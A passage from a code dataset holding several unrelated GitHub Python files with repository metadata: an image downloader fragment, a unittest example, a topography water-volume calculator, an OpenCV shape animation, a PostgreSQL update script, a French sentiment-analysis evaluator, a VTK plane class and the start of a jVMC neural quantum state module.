# print(img_source)\n for img in img_source:\n url = img['src']\n print(url)\n img = requests.get(url, headers=headers).content\n f = open(title+'\\\\'+img_name + '.jpg', 'wb')\n f.write(img)\n f.close()\n\n\n\n\n","repo_name":"xiaohuiduan/python_samll_project","sub_path":"picture.py","file_name":"picture.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"41772787485","text":"# python -m unittest test\n# python -m unittest -v test\n# python -m unittest discover\n# python -m unittest discover -s tests // run tests in the \"tests\" folder\n# python -m unittest discover -s tests -t src // also specify source location\n# coverage run -m unittest discover\n# coverage report\n# coverage html\n# coverage-lcov\nfrom fractions import Fraction\nimport unittest\n\nfrom my_sum import sum\n\nclass TestSum(unittest.TestCase):\n def test_list_int(self):\n \"\"\"\n Test that it can sum a list of integers\n \"\"\"\n data = [1, 2, 3]\n result = sum(data)\n self.assertEqual(result, 6)\n\n def test_list_fraction(self):\n \"\"\"\n Test that it can sum a list of fractions\n \"\"\"\n data = [Fraction(1, 4), Fraction(1, 4), Fraction(2, 5)]\n result = sum(data)\n self.assertEqual(result, 1)\n \n def test_bad_type(self):\n data = \"banana\"\n with self.assertRaises(TypeError):\n result = sum(data)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"thimotyb/python-testing","sub_path":"project/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30634234458","text":"import datetime\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport tkinter as tk\nfrom tkinter import filedialog\n\nvolume_list = []\nlevel_list = []\n\nbefore_time = datetime.datetime.now()\n\nprint(\"Importing text file\")\nprint(\"____________________________________\")\n\nroot = tk.Tk()\nroot.withdraw()\n\nfilename = filedialog.askopenfilename(title=\"Select point text file\")\n\ntry:\n df = np.genfromtxt(filename, delimiter=\" \")\n num_cols = df.shape[1]\nexcept:\n try:\n df = np.genfromtxt(filename, delimiter=\",\")\n num_cols = df.shape[1]\n except:\n try:\n df = np.genfromtxt(filename, delimiter=\"\\t\")\n num_cols = df.shape[1]\n except:\n print(\"Not Uploaded\")\n raise SystemExit\n\n\nprint(\"Uploaded successfully\")\n\nif num_cols == 3:\n x, y, z = df[:, 0], df[:, 1], df[:, 2]\nelif num_cols == 4:\n x, y, z = df[:, 1], df[:, 2], df[:, 3]\nelse:\n raise ValueError(f\"There are {num_cols} columns in point text data. Should have 3 or 4 columns\")\n\nprint(\"____________________________________\")\n\nS = int(input(\"Enter fixed distance between points: \"))\nprint(\"____________________________________\")\n\nif type(S) is str:\n raise TypeError(\"You entered wrong\")\n\nprint(\"For the water volume calculation below a certain level;\")\nprint(\"Two height levels will be required. Water volumes will be calculated for all intermediate levels at 1 meter intervals!\")\nprint(\"____________________________________\")\n\nmax_level = int(input(\"Enter a height level: \")) + 1\nif type(max_level) is str:\n raise TypeError(\"You entered wrong\")\nmin_level = int(input(\"Now enter a lower height level: \"))\nif type(min_level) is str:\n raise TypeError(\"You entered wrong\")\n\nprint(\"____________________________________\")\n\nif min_level > max_level:\n raise Exception(\"You must enter the second value lower\")\n\nsave_dir = filedialog.askdirectory(title=\"Select the folder to save\")\nfor height in range(min_level, max_level):\n # Point filter according to input level\n level_list.append(height)\n filtered_points = df[z < height]\n\n n = len(filtered_points)\n\n # Volume Calculations\n if num_cols == 3:\n f = height - np.mean(filtered_points[:, 2])\n elif num_cols == 4:\n f = height - np.mean(filtered_points[:, 3])\n area = (((np.sqrt(n) - 1) * S) ** 2)\n volume = area * f\n volume_list.append(volume)\n\n # Graph points\n fig, ax = plt.subplots(figsize=(8, 6))\n if num_cols == 3:\n ax.scatter(df[:, 0], df[:, 1], c='grey', alpha=0.2)\n scatter = ax.scatter(filtered_points[:, 0], filtered_points[:, 1], c=filtered_points[:, 2], cmap='viridis', s=1)\n elif num_cols == 4:\n ax.scatter(df[:, 1], df[:, 2], c='grey', alpha=0.2)\n scatter = ax.scatter(filtered_points[:, 1], filtered_points[:, 2], c=filtered_points[:, 3], cmap='viridis', s=1)\n ax.set_xlabel('Y')\n ax.set_ylabel('X')\n ax.set_title(f'Z={height}. LEVEL')\n\n filename = \"{}.jpeg\".format(height)\n print(f\"{filename} it is drawn and the calculations are saved to the text file\")\n plt.colorbar(scatter, ax=ax)\n resolution_value = 300\n plt.savefig(f\"{save_dir}/{filename}\", dpi=resolution_value)\n\n with open(f\"{save_dir}/RESULTS.txt\", \"a\") as dosya:\n dosya.write(\"_______________________\\n\")\n dosya.write(f\"Height: {height}\\n\")\n dosya.write(\"***********\\n\")\n dosya.write(f\"Number of points below level {height}: {n}\\n\")\n dosya.write(f\"Difference of Z-means from {height}. level: {f:.2f}\\n\")\n dosya.write(\"Area: {:,.2f} m2\\n\".format(area))\n dosya.write(\"Volume: {:,.2f} m3\\n\".format(volume))\n\nsecond = (datetime.datetime.now() - before_time).total_seconds()\n\nwith open(f\"{save_dir}/RESULTS.txt\", \"a\") as file:\n file.write(\"_______________________\\n\\n\")\n file.write(f\"Total process time: {second:.0f} seconds\\n\")\n file.write(\"_______________________\\n\\n\")\n\nfile.close()\n\nplt.clf()\nx = level_list\ny = []\nfor vol in volume_list:\n y.append(vol/1000000)\n\nyy = min(y) / 3\n\nplt.bar(x, y)\nplt.xticks(x)\nplt.yticks(y)\nplt.ylim(ymin=yy)\nplt.ylabel('Volume (million m3)')\nplt.xlabel('Water Height Levels (m)')\nplt.title('Water Volume Graph')\nplt.savefig(f\"{save_dir}/{min_level}_{max_level-1}.jpeg\")\n","repo_name":"ogokdas/topography","sub_path":"topography.py","file_name":"topography.py","file_ext":"py","file_size_in_byte":4240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40842163076","text":"#Oppgave 2 : Regning med løkker\ntall = int(input(\"tast inn tall: \"))\nnum = []\nminSum = 0\n\nwhile tall != 0:\n num.append(tall)\n tall = int(input(\"tast inn tall: \"))\n\nfor x in range(0, len(num)):\n minSum += num[x]\n\nprint(minSum)\n\n#finn storste\nstorste = num[0]\nfor x in num:\n if storste < x:\n storste = x\nprint(storste)\n\n#finn minste\nminste = num[0]\nfor x in num:\n if minste > x:\n minste = x\nprint(minste)\n","repo_name":"yastaheran/Litt-Paa-Sia","sub_path":"Python/Oblig-IN1000/Oblig4/regnelokke.py","file_name":"regnelokke.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"940029156","text":"# Importing necessary packages\nimport argparse\nimport cv2\nimport numpy as np\nimport random\n\nap = argparse.ArgumentParser()\n\n# Command line arguments\nap.add_argument(\"-i\", \"--image\", type=str, default=\"Quicksilver.jpg\",\n\thelp=\"path to the input image\")\n\t\nap.add_argument(\"-e\",\"--endpoints\",type=str,default=\"3\")\nap.add_argument(\"-sp\",\"--speed\",type=str,default=\"1\")\nap.add_argument(\"-th\",\"--thickness\",type=str,default=\"1\")\n\nargs = vars(ap.parse_args())\n\n# Find dimensions of image\nimage = cv2.imread(args[\"image\"])\n(h, w) = image.shape[:2]\n\n# Converting user inputs into variables\nendpoints = int(args[\"endpoints\"])\nspeed = int(args[\"speed\"])\nthickness = int(args[\"thickness\"])\n\n# Defining two empty lists\npointsX0 = []\npointsY0 = []\n\n# This function will append the coordinates into a list for the shape\ndef point_arrays(endpoints, speed):\n\tif endpoints == 3:\n\t\tarrI = np.array([[pointsX[-3]+speed,pointsY[-3]+speed],[pointsX[-2]+speed,pointsY[-2]+speed],[pointsX[-1]+speed,pointsY[-1]+speed]])\n\t\treturn arrI\n\telif endpoints == 4:\n\t\tarrI = np.array([[pointsX[-4]+speed,pointsY[-4]+speed],[pointsX[-3]+speed,pointsY[-3]+speed],[pointsX[-2]+speed,pointsY[-2]+speed],[pointsX[-1]+speed,pointsY[-1]+speed]])\n\t\treturn arrI\n\n# Generates a random color\ndef random_color():\n\tblue_intensity = random.randint(0,256)\n\tgreen_intensity = random.randint(0,256)\n\tred_intensity = random.randint(0,256)\n\n\tgenerated_color = (blue_intensity, green_intensity, red_intensity)\n\t\n\treturn generated_color\n\n# The movement portion only applies for the triangle\n\n# Decide which vertex of the triangle is touching which edge of the picture to inform future movements\ndef tri_decide(arrIII):\n\n\tvIV = w - speed\n\tvV = h - speed\n\tvVI = speed\n\tif arrIII[0,0] >= vIV:\n\t\treturn 0\n\telif arrIII[0,0] <= vVI:\n\t\treturn 1\n\telif arrIII[1,0] >= vIV:\n\t\treturn 2\n\telif arrIII[1,0] <= vVI:\n\t\treturn 3\n\telif arrIII[2,0] >= vIV:\n\t\treturn 4\n\telif arrIII[2,0] <= vVI:\n\t\treturn 5\n\telif arrIII[0,1] >= vV:\n\t\treturn 6\n\telif arrIII[0,1] <= vVI:\n\t\treturn 7\n\telif arrIII[1,1] >= vV:\n\t\treturn 8\n\telif arrIII[1,1] <= vVI:\n\t\treturn 9\n\telif arrIII[2,1] >= vV:\n\t\treturn 10\n\telif arrIII[2,1] <= vVI:\n\t\treturn 11\n\n# This function initializes the triangle location\ndef tri_initialize(arrIII):\n\n\tvIV = w - speed\n\tvV = h - speed\n\tvVI = speed\n\tif arrIII[0,0] >= vIV:\n\t\tadd = vIV - arrIII[0,0]\n\t\tarrIII[0,0] += add\n\t\tarrIII[1,0] += add\n\t\tarrIII[2,0] += add\n\t\treturn arrIII\n\telif arrIII[0,0] <= vVI:\n\t\tadd = vVI - arrIII[0,0]\n\t\tarrIII[0,0] += add\n\t\tarrIII[1,0] += add\n\t\tarrIII[2,0] += add\n\t\treturn arrIII\n\telif arrIII[1,0] >= vIV:\n\t\tadd = vIV - arrIII[1,0]\n\t\tarrIII[0,0] += add\n\t\tarrIII[1,0] += add\n\t\tarrIII[2,0] += add\n\t\treturn arrIII\n\telif arrIII[1,0] <= vVI:\n\t\tadd = vVI - arrIII[1,0]\n\t\tarrIII[0,0] += add\n\t\tarrIII[1,0] += add\n\t\tarrIII[2,0] += add\n\t\treturn arrIII\n\telif arrIII[2,0] >= vIV:\n\t\tadd = vIV - arrIII[2,0]\n\t\tarrIII[0,0] += add\n\t\tarrIII[1,0] += add\n\t\tarrIII[2,0] += add\n\t\treturn arrIII\n\telif arrIII[2,0] <= vVI:\n\t\tadd = vVI - arrIII[2,0]\n\t\tarrIII[0,0] += add\n\t\tarrIII[1,0] += add\n\t\tarrIII[2,0] += add\n\t\treturn arrIII\n\telif arrIII[0,1] >= vV:\n\t\tadd = vV - arrIII[0,1]\n\t\tarrIII[0,1] += add\n\t\tarrIII[1,1] += add\n\t\tarrIII[2,1] += add\n\t\treturn arrIII\n\telif arrIII[0,1] <= vVI:\n\t\tadd = vVI - arrIII[0,1]\n\t\tarrIII[0,1] += add\n\t\tarrIII[1,1] += add\n\t\tarrIII[2,1] += add\n\t\treturn arrIII\n\telif arrIII[1,1] >= vV:\n\t\tadd = vV - arrIII[1,1]\n\t\tarrIII[0,1] += add\n\t\tarrIII[1,1] += add\n\t\tarrIII[2,1] += add\n\t\treturn arrIII\n\telif arrIII[1,1] <= vVI:\n\t\tadd = vVI - arrIII[1,1]\n\t\tarrIII[0,1] += add\n\t\tarrIII[1,1] += add\n\t\tarrIII[2,1] += add\n\t\treturn arrIII\n\telif arrIII[2,1] >= vV:\n\t\tadd = vV - arrIII[2,1]\n\t\tarrIII[0,1] += add\n\t\tarrIII[1,1] += add\n\t\tarrIII[2,1] += add\n\t\treturn arrIII\n\telif arrIII[2,1] <= vVI:\n\t\tadd = vVI - arrIII[2,1]\n\t\tarrIII[0,1] += add\n\t\tarrIII[1,1] += add\n\t\tarrIII[2,1] += add\n\t\treturn arrIII\n\na = 0\nb = 0\nc = 0\n\npointsX = pointsX0.copy()\npointsY = pointsY0.copy()\n\n# This randomly generates the coordinates of the shape\nfor a in range(0, endpoints):\n\trX = random.randint(0, w-1)\n\tpointsX.append(rX)\nfor b in range(0, endpoints):\n\trY = random.randint(0, h-1)\n\tpointsY.append(rY)\n\nlowest_point_Y = max(pointsY)\ndistanceI = h - lowest_point_Y\n\nright_point_X = max(pointsX)\ndistanceII = w - right_point_X\n\n# This function is used to move the triangle from its original location and set up the movement with the rest of the program\ndef original_move():\n\tglobal c\n\tglobal distanceI\n\tglobal distanceII\n\tglobal thickness\n\t\t\n\twhile c < distanceI and c < distanceII:\n\t\tglobal arrIII\n\t\timageI = image.copy()\n\t\tarrII = point_arrays(endpoints, c)\n\t\tarrIII = arrII.copy()\n\t\tfinal_image = cv2.polylines(imageI,[arrIII],True,random_color(),thickness)\n\n\t\tcv2.imshow(\"Modified_Image\",final_image)\n\t\tcv2.waitKey(2)\n\t\tc += speed\n\t\tglobal arrIV\n\t\tarrIV = arrIII.copy()\n\treturn arrIV\n\t\t\narrV = original_move()\n\n# Makes the triangle bounce around the edges of the image\nif endpoints == 3:\t\n\twhile True:\n\t\t\n\t\tglobal d\n\t\td = tri_decide(arrV)\n\t\tarrIII = tri_initialize(arrV)\n\t\tr = random.randint(0,1)\n\t\t\n\t\tvI = w + speed\n\t\tvII = h + speed\n\t\tvIII = speed\n\t\tthickness += 1\n\t\t\n\t\twhile bool(bool(bool(arrV[0,0] <= vI and arrV[0,0] >= vIII) and bool(arrV[1,0] <= vI and arrV[1,0] >= vIII)) and bool(bool(arrV[2,0] <= vI and arrV[2,0] >= vIII) and bool(arrV[0,1] <= vII and arrV[0,1] >= vIII)) and bool(bool(arrV[1,1] <= vII and arrV[1,1] >= vIII) and bool(arrV[2,1] <= vII and arrV[2,1] >= vIII))) == True:\n\n\t\t\timageII = image.copy()\n\t\t\t\n\t\t\tif d == 0 or d == 2 or d == 4:\n\t\t\t\tarrIII[0,0] -= speed\n\t\t\t\tarrIII[1,0] -= speed\n\t\t\t\tarrIII[2,0] -= speed\n\t\t\t\tif r == 0:\n\t\t\t\t\tarrIII[0,1] -= speed\n\t\t\t\t\tarrIII[1,1] -= speed\n\t\t\t\t\tarrIII[2,1] -= speed\n\t\t\t\telif r == 1:\n\t\t\t\t\tarrIII[0,1] += speed\n\t\t\t\t\tarrIII[1,1] += speed\n\t\t\t\t\tarrIII[2,1] += speed\n\t\t\t\n\t\t\t\tfinal_image = cv2.polylines(imageII,[arrIII],True,random_color(),thickness)\n\t\t\t\tcv2.imshow(\"Modified_Image\",final_image)\n\t\t\t\tcv2.waitKey(2)\n\t\t\telif d == 1 or d == 3 or d == 5:\n\t\t\t\tarrIII[0,0] += speed\n\t\t\t\tarrIII[1,0] += speed\n\t\t\t\tarrIII[2,0] += speed\n\t\t\t\tif r == 0:\n\t\t\t\t\tarrIII[0,1] += speed\n\t\t\t\t\tarrIII[1,1] += speed\n\t\t\t\t\tarrIII[2,1] += speed\n\t\t\t\telif r == 1:\n\t\t\t\t\tarrIII[0,1] -= speed\n\t\t\t\t\tarrIII[1,1] -= speed\n\t\t\t\t\tarrIII[2,1] -= speed\n\t\t\t\n\t\t\t\tfinal_image = cv2.polylines(imageII,[arrIII],True,random_color(),thickness)\n\t\t\t\tcv2.imshow(\"Modified_Image\",final_image)\n\t\t\t\tcv2.waitKey(2)\n\t\t\telif d == 6 or d == 8 or d == 10:\n\t\t\t\tarrIII[0,1] -= speed\n\t\t\t\tarrIII[1,1] -= speed\n\t\t\t\tarrIII[2,1] -= speed\n\t\t\t\tif r == 0:\n\t\t\t\t\tarrIII[0,0] += speed\n\t\t\t\t\tarrIII[1,0] += speed\n\t\t\t\t\tarrIII[2,0] += speed\n\t\t\t\telif r == 1:\n\t\t\t\t\tarrIII[0,0] -= speed\n\t\t\t\t\tarrIII[1,0] -= speed\n\t\t\t\t\tarrIII[2,0] -= speed\n\t\t\t\t\n\t\t\t\tfinal_image = cv2.polylines(imageII,[arrIII],True,random_color(),thickness)\n\t\t\t\tcv2.imshow(\"Modified_Image\",final_image)\n\t\t\t\tcv2.waitKey(2)\n\t\t\telif d == 7 or d == 9 or d == 11:\n\t\t\t\tarrIII[0,1] += speed\n\t\t\t\tarrIII[1,1] += speed\n\t\t\t\tarrIII[2,1] += speed\n\t\t\t\tif r == 0:\n\t\t\t\t\tarrIII[0,0] -= speed\n\t\t\t\t\tarrIII[1,0] -= speed\n\t\t\t\t\tarrIII[2,0] -= speed\n\t\t\t\telif r == 1:\n\t\t\t\t\tarrIII[0,0] += speed\n\t\t\t\t\tarrIII[1,0] += speed\n\t\t\t\t\tarrIII[2,0] += speed\n\t\t\t\t\n\t\t\t\tfinal_image = cv2.polylines(imageII,[arrIII],True,random_color(),thickness)\n\t\t\t\tcv2.imshow(\"Modified_Image\",final_image)\n\t\t\t\tcv2.waitKey(2)\n\n# This program was Generating_Shapes_SV_XXXII.py by SarvasyaVikas\n","repo_name":"SarvasyaVikas/Image-Manipulation","sub_path":"Generating_Shapes_SV.py","file_name":"Generating_Shapes_SV.py","file_ext":"py","file_size_in_byte":7314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"15371970616","text":"import psycopg2\nfrom bd import conn\n\n#def update_zone_occupation(zone_id, zone_people_inside):\n'''Actualizar los person_mac que se encuentran en la zona'''\n\n\ntry:\n with conn.cursor() as cur:\n # En este caso no necesitamos limpiar ningún dato\n cur.execute(\"SELECT id, zone_name, zone_people_inside FROM bfz_zone;\")\n # print('Hay {} personas en la zona'.format(zone_people_inside))\n\n # Con fetchall traemos todas las filas\n bfz_data = cur.fetchall()\n\n # Recorrer e imprimir\n for bfz in bfz_data:\n print(bfz)\n \n esp32_status = 1\n\n update_position = \"UPDATE bfz_zone SET zone_people_inside = 7 WHERE id = 1;\"\n #zone_people_inside = 1\n #cur.execute(update_position, (zone_people_inside))\n cur.execute(update_position)\n conn.commit()\n count = cur.rowcount\n print(count)\n\n\n \nexcept psycopg2.Error as e:\n print(\"Ocurrió un error al consultar: \", e)\nfinally:\n conn.close()","repo_name":"thygolem/indoorQt","sub_path":"db/consulta.py","file_name":"consulta.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33383662030","text":"from sklearn.metrics import classification_report\nfrom textblob_fr import PatternTagger, PatternAnalyzer\nfrom textblob import Blobber\nfrom tqdm import tqdm\nfrom pandas.core.frame import DataFrame\nimport pandas as pd\nimport re\nfrom spacy.lang.fr.stop_words import STOP_WORDS\n\n\ntb = Blobber(pos_tagger=PatternTagger(), analyzer=PatternAnalyzer())\n\n\ndef cleanup(text):\n text = text.lower()\n\n Word_Tok = []\n for word in re.sub(\"\\W\", \" \", text).split():\n Word_Tok.append(word)\n\n stop_words = set(STOP_WORDS)\n deselect_stop_words = ['n', 'ne', 'non' 'pas', 'plus',\n 'personne', 'aucun', 'ni', 'aucune', 'rien']\n for w in deselect_stop_words:\n if w in stop_words:\n stop_words.remove(w)\n else:\n continue\n\n filteredComment = [w for w in Word_Tok if not (\n (w in stop_words) or (len(w) == 1))]\n\n return ' '.join(filteredComment)\n\n\ndef getClasseFromComment(text):\n polarity = tb(cleanup(text)).sentiment[0]\n if polarity > 0:\n return \"Positive\"\n if polarity < 0:\n return \"Negative\"\n return \"Neutral\"\n\n\ndef getClasseFromNote(note):\n if note > 3:\n return \"Positive\"\n if note < 2.5:\n return \"Negative\"\n return \"Neutral\"\n\n\ndef analyseMovie(idFilm):\n df = pd.read_csv(f\"data/{idFilm}.csv\")\n y_true = df[\"Note\"].apply(getClasseFromNote)\n y_pred = df[\"Commentaire\"].apply(getClasseFromComment)\n return classification_report(y_true, y_pred, output_dict=True), y_pred.value_counts()\n\n\ndef analyseAll():\n df = pd.read_csv(\"data/data.csv\")\n Note_, ClasseN_, ClasseC_, Difference_, PrecisionP_, PrecisionN_, PrecisionNEU_, PrecisionG_, PrecisionW_ = [\n ], [], [], [], [], [], [], [], []\n for index, id in tqdm(df[\"ID\"].items(), total=len(df.index), desc='Analyse'):\n report, count = analyseMovie(id)\n nbrPos, nbrNeg, nbrNeu = count\n\n Note_.append(round(((nbrPos*1.3 - nbrNeg - nbrNeu*0.1) /\n (nbrPos*1.3 + nbrNeg + nbrNeu*0.1)) * 5, 2))\n ClasseN_.append(getClasseFromNote(Note_[index]))\n if(nbrPos > nbrNeg*3.6):\n ClasseC_.append(\"Positive\")\n elif(nbrPos < nbrNeg*2.1):\n ClasseC_.append(\"Negative\")\n else:\n ClasseC_.append(\"Neutral\")\n Difference_.append(round(Note_[index] - df[\"Note\"][index], 2))\n PrecisionP_.append(round(report[\"Positive\"][\"precision\"]*100, 2))\n PrecisionN_.append(round(report[\"Negative\"][\"precision\"]*100, 2))\n PrecisionNEU_.append(round(report[\"Neutral\"][\"precision\"]*100, 2))\n PrecisionG_.append(round(report[\"macro avg\"][\"precision\"]*100, 2))\n PrecisionW_.append(round(report[\"weighted avg\"][\"precision\"]*100, 2))\n df[\"Note Estimé\"] = Note_\n df[\"Difference Note\"] = Difference_\n df[\"Classe Estimé Note\"] = ClasseN_\n df[\"Classe Estimé Commentaires\"] = ClasseC_\n df[\"Precision Positive\"] = PrecisionP_\n df[\"Precision Negative\"] = PrecisionN_\n df[\"Precision Neutral\"] = PrecisionNEU_\n df[\"Precision Global\"] = PrecisionG_\n df[\"Precision Weighted\"] = PrecisionW_\n df.to_csv(\"data/analysis.csv\", index=False, encoding='utf-8')\n return df\n\n\ndef classeStats(df, methode):\n report = classification_report(df[\"Classe\"], df[methode], output_dict=True)\n return {\"Precision Positive\": round(report['Positive']['precision']*100, 2),\n \"Precision Neutral\": round(report['Neutral']['precision']*100, 2),\n \"Precision Negative\": round(report['Negative']['precision']*100, 2),\n \"Precision Global\": round(report['macro avg']['precision']*100, 2),\n \"Precision Weighted\": round(report['weighted avg']['precision']*100, 2)}\n\n\ndef analyseResults(df):\n # Stats de determination des classes des commentaires\n stats = DataFrame({\"Precision Positive\": [df[\"Precision Positive\"].mean(), df[\"Precision Positive\"].median(), df[\"Precision Positive\"].min(), df[\"Precision Positive\"].max()],\n \"Precision Negative\": [df[\"Precision Negative\"].mean(), df[\"Precision Negative\"].median(), df[\"Precision Negative\"].min(), df[\"Precision Negative\"].max()],\n \"Precision Neutral\": [df[\"Precision Neutral\"].mean(), df[\"Precision Neutral\"].median(), df[\"Precision Neutral\"].min(), df[\"Precision Neutral\"].max()],\n \"Precision Global\": [df[\"Precision Global\"].mean(), df[\"Precision Global\"].median(), df[\"Precision Global\"].min(), df[\"Precision Global\"].max()],\n \"Precision Weighted\": [df[\"Precision Weighted\"].mean(), df[\"Precision Weighted\"].median(), df[\"Precision Weighted\"].min(), df[\"Precision Weighted\"].max()],\n \"Difference Note\": [df[\"Difference Note\"].abs().mean(), df[\"Difference Note\"].abs().median(), df[\"Difference Note\"].abs().min(), df[\"Difference Note\"].abs().max()]},\n index=['Moyenne',\n 'Median',\n 'Min',\n 'Max'])\n stats.to_csv(\"data/statsComment.csv\")\n print(\"\\nStatistiques sur la determination de la classe des commentaires:\\n\", stats)\n\n # Stats de determination des classes des films\n statsClasse = DataFrame([classeStats(df, \"Classe Estimé Note\"), classeStats(df, \"Classe Estimé Commentaires\")],\n index=[\"Classe Estimé Note\", \"Classe Estimé Commentaires\"])\n statsClasse.to_csv(\"data/statsClasse.csv\")\n print(\"\\nStatistiques sur la determination de la classe des films:\\n\", statsClasse)\n\n\nif __name__ == \"__main__\":\n df = analyseAll()\n print(df[[\"Nom\", \"Nombre Commentaires\", \"Note\", \"Note Estimé\", \"Difference Note\", \"Classe\",\n \"Classe Estimé Note\", \"Classe Estimé Commentaires\", \"Precision Global\", \"Precision Weighted\"]])\n analyseResults(df)\n","repo_name":"QuentinBeauchet/ProjetTATIA","sub_path":"analyser.py","file_name":"analyser.py","file_ext":"py","file_size_in_byte":5815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29172351360","text":"\"\"\"https://github.com/kujason/scene_vis\"\"\"\n\nimport numpy as np\nimport vtk\n\n\nclass VtkPlane(vtk.vtkActor):\n \"\"\"Axis aligned plane\"\"\"\n\n def __init__(self):\n super().__init__()\n self.vtk_plane_source = vtk.vtkPlaneSource()\n self.vtk_plane_mapper = vtk.vtkPolyDataMapper()\n\n def set_plane(self, axes, offset, extents: np.ndarray):\n \"\"\"Calculates 3 points for plane visualization\n based on the provided ground plane\n\n Args:\n axes: \"xy\", \"xz\", \"yz\"\n offset: Offset distance\n extents: Extents along the plane for visualization (2, 2)\n \"\"\"\n\n extents = np.asarray(extents)\n assert extents.shape == (2, 2)\n\n min_i = extents[0][0]\n max_i = extents[0][1]\n min_j = extents[1][0]\n max_j = extents[1][1]\n\n if axes == \"xy\":\n plane_points = np.asarray(\n [[min_i, min_j, offset], [max_i, min_j, offset], [min_i, max_j, offset]]\n )\n elif axes == \"xz\":\n plane_points = np.asarray(\n [[min_i, offset, min_j], [max_i, offset, min_j], [min_i, offset, max_j]]\n )\n elif axes == \"yz\":\n plane_points = np.asarray(\n [[offset, min_i, min_j], [offset, max_i, min_j], [offset, min_i, max_j]]\n )\n else:\n raise ValueError(\"Invalid axes\", axes)\n\n self.vtk_plane_source.SetOrigin(*plane_points[0])\n self.vtk_plane_source.SetPoint1(*plane_points[1])\n self.vtk_plane_source.SetPoint2(*plane_points[2])\n\n self.vtk_plane_source.Update()\n\n vtk_plane_poly_data = self.vtk_plane_source.GetOutput()\n self.vtk_plane_mapper.SetInputData(vtk_plane_poly_data)\n\n self.SetMapper(self.vtk_plane_mapper)\n\n def set_transform(self, transform):\n self.vtk_transform = vtk.vtkTransform()\n self.vtk_transform.SetMatrix(transform.flatten())\n self.SetUserTransform(self.vtk_transform)\n","repo_name":"ljj7975/3d_object_detection","sub_path":"lib/scene_vis/src/scene_vis/vtk_wrapper/vtk_plane.py","file_name":"vtk_plane.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16302414801","text":"import jax\nfrom jax.config import config\nconfig.update(\"jax_enable_x64\", True)\nfrom jax import jit, grad, vmap\nfrom jax import numpy as jnp\nfrom jax import random\nfrom jax.tree_util import tree_flatten, tree_unflatten, tree_map\nfrom jax.flatten_util import ravel_pytree\nimport flax\nimport flax.linen as nn\nfrom flax.core.frozen_dict import freeze, unfreeze\nimport numpy as np\n\nimport jVMC\nimport jVMC.global_defs as global_defs\nfrom jVMC.nets import CpxRBM\nfrom jVMC.nets import RBM\nimport jVMC.mpi_wrapper as mpi\n\nfrom functools import partial\nimport collections\nimport time\nfrom math import isclose\n\nfrom typing import Sequence\n\n\ndef create_batches(configs, b):\n\n append = b * ((configs.shape[0] + b - 1) // b) - configs.shape[0]\n pads = [(0, append), ] + [(0, 0)] * (len(configs.shape) - 1)\n\n return jnp.pad(configs, pads).reshape((-1, b) + configs.shape[1:])\n\n\ndef eval_batched(batchSize, fun, s):\n\n sb = create_batches(s, batchSize)\n\n def scan_fun(c, x):\n return c, jax.vmap(lambda y: fun(y), in_axes=(0,))(x)\n\n res = jax.lax.scan(scan_fun, None, jnp.array(sb))[1].reshape((-1,))\n\n return res[:s.shape[0]]\n\n\ndef flat_gradient(fun, params, arg):\n gr = grad(lambda p, y: jnp.real(fun.apply(p, y)))(params, arg)[\"params\"]\n gr = tree_flatten(tree_map(lambda x: x.ravel(), gr))[0]\n gi = grad(lambda p, y: jnp.imag(fun.apply(p, y)))(params, arg)[\"params\"]\n gi = tree_flatten(tree_map(lambda x: x.ravel(), gi))[0]\n return jnp.concatenate(gr) + 1.j * jnp.concatenate(gi)\n\ndef flat_gradient_cpx_nonholo(fun, params, arg):\n gr = grad(lambda p, y: jnp.real(fun.apply(p, y)))(params, arg)[\"params\"]\n gr = tree_flatten(tree_map(lambda x: [jnp.real(x.ravel()), -jnp.imag(x.ravel())], gr))[0]\n gi = grad(lambda p, y: jnp.imag(fun.apply(p, y)))(params, arg)[\"params\"]\n gi = tree_flatten(tree_map(lambda x: [jnp.real(x.ravel()), -jnp.imag(x.ravel())], gi))[0]\n return jnp.concatenate(gr) + 1.j * jnp.concatenate(gi)\n\n\ndef flat_gradient_real(fun, params, arg):\n g = grad(lambda p, y: jnp.real(fun.apply(p, y)))(params, arg)[\"params\"]\n g = tree_flatten(tree_map(lambda x: x.ravel(), g))[0]\n return jnp.concatenate(g)\n\ndef flat_gradient_holo(fun, params, arg):\n g = grad(lambda p, y: jnp.real(fun.apply(p, y)))(params, arg)[\"params\"]\n g = tree_flatten(tree_map(lambda x: [x.ravel(), 1.j*x.ravel()], g))[0]\n return jnp.concatenate(g)\n\ndef dict_gradient(fun, params, arg):\n gr = grad(lambda p, y: jnp.real(fun.apply(p, y)))(params, arg)[\"params\"]\n gr = tree_map(lambda x: x.ravel(), gr)\n gi = grad(lambda p, y: jnp.imag(fun.apply(p, y)))(params, arg)[\"params\"]\n gi = tree_map(lambda x: x.ravel(), gi)\n return tree_map(lambda x,y: x + 1.j*y, gr, gi)\n\n\ndef dict_gradient_real(fun, params, arg):\n g = grad(lambda p, y: jnp.real(fun.apply(p, y)))(params, arg)[\"params\"]\n g = tree_map(lambda x: x.ravel(), g)\n return g\n\n\nclass NQS:\n \"\"\"Wrapper class providing basic functionality of variational states.\n \n This class can operate in two modi:\n #. Single-network ansatz\n Quantum state of the form :math:`\\psi_\\\\theta(s)\\equiv\\exp(r_\\\\theta(s))`, \\\n where the network :math:`r_\\\\theta` is\n a) holomorphic, i.e., parametrized by complex valued parameters :math:`\\\\vartheta`.\n b) non-holomorphic, i.e., parametrized by real valued parameters :math:`\\\\theta`.\n #. Two-network ansatz\n Quantum state of the 